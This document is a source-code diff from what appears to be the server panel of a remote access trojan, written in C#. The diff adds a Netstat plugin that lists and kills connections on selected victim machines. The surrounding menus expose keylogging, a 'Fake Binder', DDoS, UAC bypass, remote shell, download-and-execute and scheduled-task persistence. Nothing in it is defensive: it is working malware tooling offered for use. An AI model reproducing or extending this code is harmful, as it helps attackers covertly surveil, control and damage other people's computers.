this.sENDFILETOMEMORYToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.uPDATEToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.autoKeyloggerToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.fakeBinderToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.toolStripSeparator4 = new System.Windows.Forms.ToolStripSeparator();
this.dELETETASKToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.performanceCounter1 = new System.Diagnostics.PerformanceCounter();
@ -140,7 +141,7 @@
this.listView2 = new System.Windows.Forms.ListView();
this.columnHeader1 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.columnHeader2 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.fakeBinderToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.netstatToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.contextMenuClient.SuspendLayout();
this.statusStrip1.SuspendLayout();
this.contextMenuLogs.SuspendLayout();
@ -171,7 +172,7 @@
this.InstallToolStripMenuItem,
this.InformationToolStripMenuItem});
this.contextMenuClient.Name = "contextMenuStrip1";
this.contextMenuClient.Size = new System.Drawing.Size(179, 180);
this.contextMenuClient.Size = new System.Drawing.Size(181, 202);
//
// RemoteManagerToolStripMenuItem
//
@ -181,10 +182,11 @@
this.RemoteCameraToolStripMenuItem,
this.FileManagerToolStripMenuItem1,
this.ProcessManagerToolStripMenuItem,
this.netstatToolStripMenuItem,
this.RecordToolStripMenuItem,
this.ProgramNotificationToolStripMenuItem});
this.RemoteManagerToolStripMenuItem.Name = "RemoteManagerToolStripMenuItem";
this.RemoteManagerToolStripMenuItem.Size = new System.Drawing.Size(178, 22);
this.RemoteManagerToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
this.RemoteManagerToolStripMenuItem.Text = "Remote Manager";
//
// RemoteShellToolStripMenuItem
@ -263,7 +265,7 @@
this.KeyloggerToolStripMenuItem1,
this.FileSearchToolStripMenuItem});
this.RemoteControlToolStripMenuItem.Name = "RemoteControlToolStripMenuItem";
this.RemoteControlToolStripMenuItem.Size = new System.Drawing.Size(178, 22);
this.RemoteControlToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
this.RemoteControlToolStripMenuItem.Text = "Remote Control";
//
// SendFileToolStripMenuItem1
@ -341,7 +343,7 @@
this.DisableUACToolStripMenuItem,
this.OpenCDToolStripMenuItem});
this.MalwareToolStripMenuItem.Name = "MalwareToolStripMenuItem";
this.MalwareToolStripMenuItem.Size = new System.Drawing.Size(178, 22);
this.MalwareToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
this.MalwareToolStripMenuItem.Text = "Malware";
//
// dDOSToolStripMenuItem
@ -408,7 +410,7 @@
this.StartToolStripMenuItem2,
this.StopToolStripMenuItem3});
this.LockScreenToolStripMenuItem.Name = "LockScreenToolStripMenuItem";
this.LockScreenToolStripMenuItem.Size = new System.Drawing.Size(178, 22);
this.LockScreenToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
this.LockScreenToolStripMenuItem.Text = "Lock Screen";
//
// StartToolStripMenuItem2
@ -431,7 +433,7 @@
this.ClientControlToolStripMenuItem,
this.SystemToolStripMenuItem});
this.SystemControlToolStripMenuItem.Name = "SystemControlToolStripMenuItem";
this.SystemControlToolStripMenuItem.Size = new System.Drawing.Size(178, 22);
this.SystemControlToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
this.SystemControlToolStripMenuItem.Text = "System Control";
//
// ClientControlToolStripMenuItem
@ -520,7 +522,7 @@
this.RunasToolStripMenuItem,
this.CompMgmtLauncherToolStripMenuItem});
this.BypassUACAToolStripMenuItem.Name = "BypassUACAToolStripMenuItem";
this.BypassUACAToolStripMenuItem.Size = new System.Drawing.Size(178, 22);
this.BypassUACAToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
this.BypassUACAToolStripMenuItem.Text = "Bypass UAC";
//
// SilentCleanupToolStripMenuItem
@ -557,7 +559,7 @@
this.SchtaskInstallToolStripMenuItem,
this.SchtaskUninstallToolStripMenuItem});
this.InstallToolStripMenuItem.Name = "InstallToolStripMenuItem";
this.InstallToolStripMenuItem.Size = new System.Drawing.Size(178, 22);
this.InstallToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
this.InstallToolStripMenuItem.Text = "Install";
//
// SchtaskInstallToolStripMenuItem
@ -577,7 +579,7 @@
// InformationToolStripMenuItem
//
this.InformationToolStripMenuItem.Name = "InformationToolStripMenuItem";
this.InformationToolStripMenuItem.Size = new System.Drawing.Size(178, 22);
this.InformationToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
this.InformationToolStripMenuItem.Text = "Information";
this.InformationToolStripMenuItem.Click += new System.EventHandler(this.InformationToolStripMenuItem_Click);
//
@ -678,7 +680,7 @@
this.dELETETASKToolStripMenuItem});
this.contextMenuTasks.Name = "contextMenuStrip4";
this.contextMenuTasks.ShowImageMargin = false;
this.contextMenuTasks.Size = new System.Drawing.Size(170, 164);
this.contextMenuTasks.Size = new System.Drawing.Size(170, 142);
//
// downloadAndExecuteToolStripMenuItem
//
@ -708,6 +710,13 @@
this.autoKeyloggerToolStripMenuItem.Text = "Auto Keylogger";
this.autoKeyloggerToolStripMenuItem.Click += new System.EventHandler(this.autoKeyloggerToolStripMenuItem_Click);
//
// fakeBinderToolStripMenuItem
//
this.fakeBinderToolStripMenuItem.Name = "fakeBinderToolStripMenuItem";
this.fakeBinderToolStripMenuItem.Size = new System.Drawing.Size(169, 22);
this.fakeBinderToolStripMenuItem.Text = "Fake Binder";
this.fakeBinderToolStripMenuItem.Click += new System.EventHandler(this.fakeBinderToolStripMenuItem_Click);
//
// toolStripSeparator4
//
this.toolStripSeparator4.Name = "toolStripSeparator4";
@ -1053,12 +1062,12 @@
this.columnHeader2.Text = "Logs";
this.columnHeader2.Width = 705;
//
// fakeBinderToolStripMenuItem
// netstatToolStripMenuItem
//
this.fakeBinderToolStripMenuItem.Name = "fakeBinderToolStripMenuItem";
this.fakeBinderToolStripMenuItem.Size = new System.Drawing.Size(169, 22);
this.fakeBinderToolStripMenuItem.Text = "Fake Binder";
this.fakeBinderToolStripMenuItem.Click += new System.EventHandler(this.fakeBinderToolStripMenuItem_Click);
this.netstatToolStripMenuItem.Name = "netstatToolStripMenuItem";
this.netstatToolStripMenuItem.Size = new System.Drawing.Size(198, 22);
this.netstatToolStripMenuItem.Text = "Netstat";
this.netstatToolStripMenuItem.Click += new System.EventHandler(this.netstatToolStripMenuItem_Click);
//
// Form1
//
@ -1213,6 +1222,7 @@
private System.Windows.Forms.ToolStripMenuItem SchtaskUninstallToolStripMenuItem;
private System.Windows.Forms.ColumnHeader lv_camera;
private System.Windows.Forms.ToolStripMenuItem fakeBinderToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem netstatToolStripMenuItem;
}
}

32
Server/Forms/Form1.cs
View File

@ -1911,5 +1911,37 @@ namespace Server
return;
}
}
private void netstatToolStripMenuItem_Click(object sender, EventArgs e)
{
try
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Pac_ket").AsString = "plu_gin";
msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Netstat.dll"));
foreach (Clients client in GetSelectedClients())
{
FormNetstat netstat = (FormNetstat)Application.OpenForms["Netstat:" + client.ID];
if (netstat == null)
{
netstat = new FormNetstat
{
Name = "Netstat:" + client.ID,
Text = "Netstat:" + client.ID,
F = this,
ParentClient = client
};
netstat.Show();
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
}
}
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
return;
}
}
}
}

146
Server/Forms/FormNetstat.Designer.cs generated Normal file
View File

@ -0,0 +1,146 @@
namespace Server.Forms
{
partial class FormNetstat
{
/// <summary>
/// Required designer variable.
/// </summary>
private System.ComponentModel.IContainer components = null;
/// <summary>
/// Clean up any resources being used.
/// </summary>
/// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
protected override void Dispose(bool disposing)
{
if (disposing && (components != null))
{
components.Dispose();
}
base.Dispose(disposing);
}
#region Windows Form Designer generated code
/// <summary>
/// Required method for Designer support - do not modify
/// the contents of this method with the code editor.
/// </summary>
private void InitializeComponent()
{
this.components = new System.ComponentModel.Container();
System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormNetstat));
this.listView1 = new System.Windows.Forms.ListView();
this.lv_id = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.lv_localAddr = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.lv_remoteAddr = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.lv_state = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.contextMenuStrip1 = new System.Windows.Forms.ContextMenuStrip(this.components);
this.killToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.refreshToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.timer1 = new System.Windows.Forms.Timer(this.components);
this.contextMenuStrip1.SuspendLayout();
this.SuspendLayout();
//
// listView1
//
this.listView1.BorderStyle = System.Windows.Forms.BorderStyle.None;
this.listView1.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
this.lv_id,
this.lv_localAddr,
this.lv_remoteAddr,
this.lv_state});
this.listView1.ContextMenuStrip = this.contextMenuStrip1;
this.listView1.Dock = System.Windows.Forms.DockStyle.Fill;
this.listView1.Enabled = false;
this.listView1.FullRowSelect = true;
this.listView1.GridLines = true;
this.listView1.HeaderStyle = System.Windows.Forms.ColumnHeaderStyle.Nonclickable;
this.listView1.HideSelection = false;
this.listView1.Location = new System.Drawing.Point(0, 0);
this.listView1.Margin = new System.Windows.Forms.Padding(2);
this.listView1.Name = "listView1";
this.listView1.ShowGroups = false;
this.listView1.ShowItemToolTips = true;
this.listView1.Size = new System.Drawing.Size(545, 346);
this.listView1.Sorting = System.Windows.Forms.SortOrder.Ascending;
this.listView1.TabIndex = 0;
this.listView1.UseCompatibleStateImageBehavior = false;
this.listView1.View = System.Windows.Forms.View.Details;
//
// lv_id
//
this.lv_id.Text = "ID";
this.lv_id.Width = 92;
//
// lv_localAddr
//
this.lv_localAddr.Text = "LocalAddress";
this.lv_localAddr.Width = 161;
//
// lv_remoteAddr
//
this.lv_remoteAddr.Text = "RemoteAddress";
this.lv_remoteAddr.Width = 177;
//
// lv_state
//
this.lv_state.Text = "State";
this.lv_state.Width = 110;
//
// contextMenuStrip1
//
this.contextMenuStrip1.ImageScalingSize = new System.Drawing.Size(24, 24);
this.contextMenuStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.killToolStripMenuItem,
this.refreshToolStripMenuItem});
this.contextMenuStrip1.Name = "contextMenuStrip1";
this.contextMenuStrip1.Size = new System.Drawing.Size(121, 48);
//
// killToolStripMenuItem
//
this.killToolStripMenuItem.Name = "killToolStripMenuItem";
this.killToolStripMenuItem.Size = new System.Drawing.Size(120, 22);
this.killToolStripMenuItem.Text = "Kill";
this.killToolStripMenuItem.Click += new System.EventHandler(this.killToolStripMenuItem_Click);
//
// refreshToolStripMenuItem
//
this.refreshToolStripMenuItem.Name = "refreshToolStripMenuItem";
this.refreshToolStripMenuItem.Size = new System.Drawing.Size(120, 22);
this.refreshToolStripMenuItem.Text = "Refresh";
this.refreshToolStripMenuItem.Click += new System.EventHandler(this.refreshToolStripMenuItem_Click);
//
// timer1
//
this.timer1.Interval = 1000;
this.timer1.Tick += new System.EventHandler(this.timer1_Tick);
//
// FormNetstat
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.ClientSize = new System.Drawing.Size(545, 346);
this.Controls.Add(this.listView1);
this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
this.Margin = new System.Windows.Forms.Padding(2);
this.Name = "FormNetstat";
this.Text = "Netstat";
this.FormClosed += new System.Windows.Forms.FormClosedEventHandler(this.FormNetstat_FormClosed);
this.contextMenuStrip1.ResumeLayout(false);
this.ResumeLayout(false);
}
#endregion
private System.Windows.Forms.ColumnHeader lv_id;
public System.Windows.Forms.ListView listView1;
private System.Windows.Forms.ContextMenuStrip contextMenuStrip1;
private System.Windows.Forms.ToolStripMenuItem killToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem refreshToolStripMenuItem;
public System.Windows.Forms.Timer timer1;
private System.Windows.Forms.ColumnHeader lv_localAddr;
private System.Windows.Forms.ColumnHeader lv_remoteAddr;
private System.Windows.Forms.ColumnHeader lv_state;
}
}

78
Server/Forms/FormNetstat.cs Normal file
View File

@ -0,0 +1,78 @@
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
using System.Windows.Forms;
using Server.MessagePack;
using Server.Connection;
namespace Server.Forms
{
public partial class FormNetstat: Form
{
public Form1 F { get; set; }
internal Clients Client { get; set; }
internal Clients ParentClient { get; set; }
public FormNetstat()
{
InitializeComponent();
}
private void timer1_Tick(object sender, EventArgs e)
{
try
{
if (!Client.TcpClient.Connected || !ParentClient.TcpClient.Connected) this.Close();
}
catch { this.Close(); }
}
private async void killToolStripMenuItem_Click(object sender, EventArgs e)
{
if (listView1.SelectedItems.Count > 0)
{
foreach (ListViewItem P in listView1.SelectedItems)
{
await Task.Run(() =>
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Pac_ket").AsString = "Netstat";
msgpack.ForcePathObject("Option").AsString = "Kill";
msgpack.ForcePathObject("ID").AsString = P.SubItems[lv_id.Index].Text;
ThreadPool.QueueUserWorkItem(Client.Send, msgpack.Encode2Bytes());
});
}
}
}
private void refreshToolStripMenuItem_Click(object sender, EventArgs e)
{
ThreadPool.QueueUserWorkItem((o) =>
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Pac_ket").AsString = "Netstat";
msgpack.ForcePathObject("Option").AsString = "List";
ThreadPool.QueueUserWorkItem(Client.Send, msgpack.Encode2Bytes());
});
}
private void FormNetstat_FormClosed(object sender, FormClosedEventArgs e)
{
try
{
ThreadPool.QueueUserWorkItem((o) =>
{
Client?.Disconnected();
});
}
catch { }
}
}
}

1259
Server/Forms/FormNetstat.resx Normal file
View File

File diff suppressed because it is too large Load Diff

51
Server/Handle Packet/HandleNetstat.cs Normal file
View File

@ -0,0 +1,51 @@
using Server.Forms;
using Server.MessagePack;
using Server.Connection;
using System;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
namespace Server.Handle_Packet
{
public class HandleNetstat
{
public void GetProcess(Clients client, MsgPack unpack_msgpack)
{
try
{
FormNetstat PM = (FormNetstat)Application.OpenForms["Netstat:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (PM != null)
{
if (PM.Client == null)
{
PM.Client = client;
PM.listView1.Enabled = true;
PM.timer1.Enabled = true;
}
PM.listView1.Items.Clear();
string processLists = unpack_msgpack.ForcePathObject("Message").AsString;
string[] _NextProc = processLists.Split(new[] { "-=>" }, StringSplitOptions.None);
for (int i = 0; i < _NextProc.Length; i++)
{
if (_NextProc[i].Length > 0)
{
ListViewItem lv = new ListViewItem
{
Text = Path.GetFileName(_NextProc[i])
};
lv.SubItems.Add(_NextProc[i + 1]);
lv.SubItems.Add(_NextProc[i + 2]);
lv.SubItems.Add(_NextProc[i + 3]);
lv.ToolTipText = _NextProc[i];
PM.listView1.Items.Add(lv);
}
i += 3;
}
}
}
catch { }
}
}
}

5
Server/Handle Packet/Packet.cs
View File

@ -84,6 +84,11 @@ namespace Server.Handle_Packet
break;
}
case "netstat":
{
new HandleNetstat().GetProcess(client, unpack_msgpack);
break;
}
case "socketDownload":
{

10
Server/Server.csproj
View File

@ -113,6 +113,12 @@
<Compile Include="Algorithm\GetHash.cs" />
<Compile Include="Algorithm\Sha256.cs" />
<Compile Include="Algorithm\Zip.cs" />
<Compile Include="Forms\FormNetstat.cs">
<SubType>Form</SubType>
</Compile>
<Compile Include="Forms\FormNetstat.designer.cs">
<DependentUpon>FormNetstat.cs</DependentUpon>
</Compile>
<Compile Include="Forms\FormSetting.cs">
<SubType>Form</SubType>
</Compile>
@ -224,6 +230,7 @@
<Compile Include="Handle Packet\HandleAudio.cs" />
<Compile Include="Handle Packet\HandlePassword.cs" />
<Compile Include="Handle Packet\HandleInformation.cs" />
<Compile Include="Handle Packet\HandleNetstat.cs" />
<Compile Include="Handle Packet\HandleRecovery.cs" />
<Compile Include="Handle Packet\HandlerFileSearcher.cs" />
<Compile Include="Handle Packet\HandleChat.cs" />
@ -310,6 +317,9 @@
<EmbeddedResource Include="Forms\FormKeylogger.resx">
<DependentUpon>FormKeylogger.cs</DependentUpon>
</EmbeddedResource>
<EmbeddedResource Include="Forms\FormNetstat.resx">
<DependentUpon>FormNetstat.cs</DependentUpon>
</EmbeddedResource>
<EmbeddedResource Include="Forms\FormPorts.resx">
<DependentUpon>FormPorts.cs</DependentUpon>
</EmbeddedResource>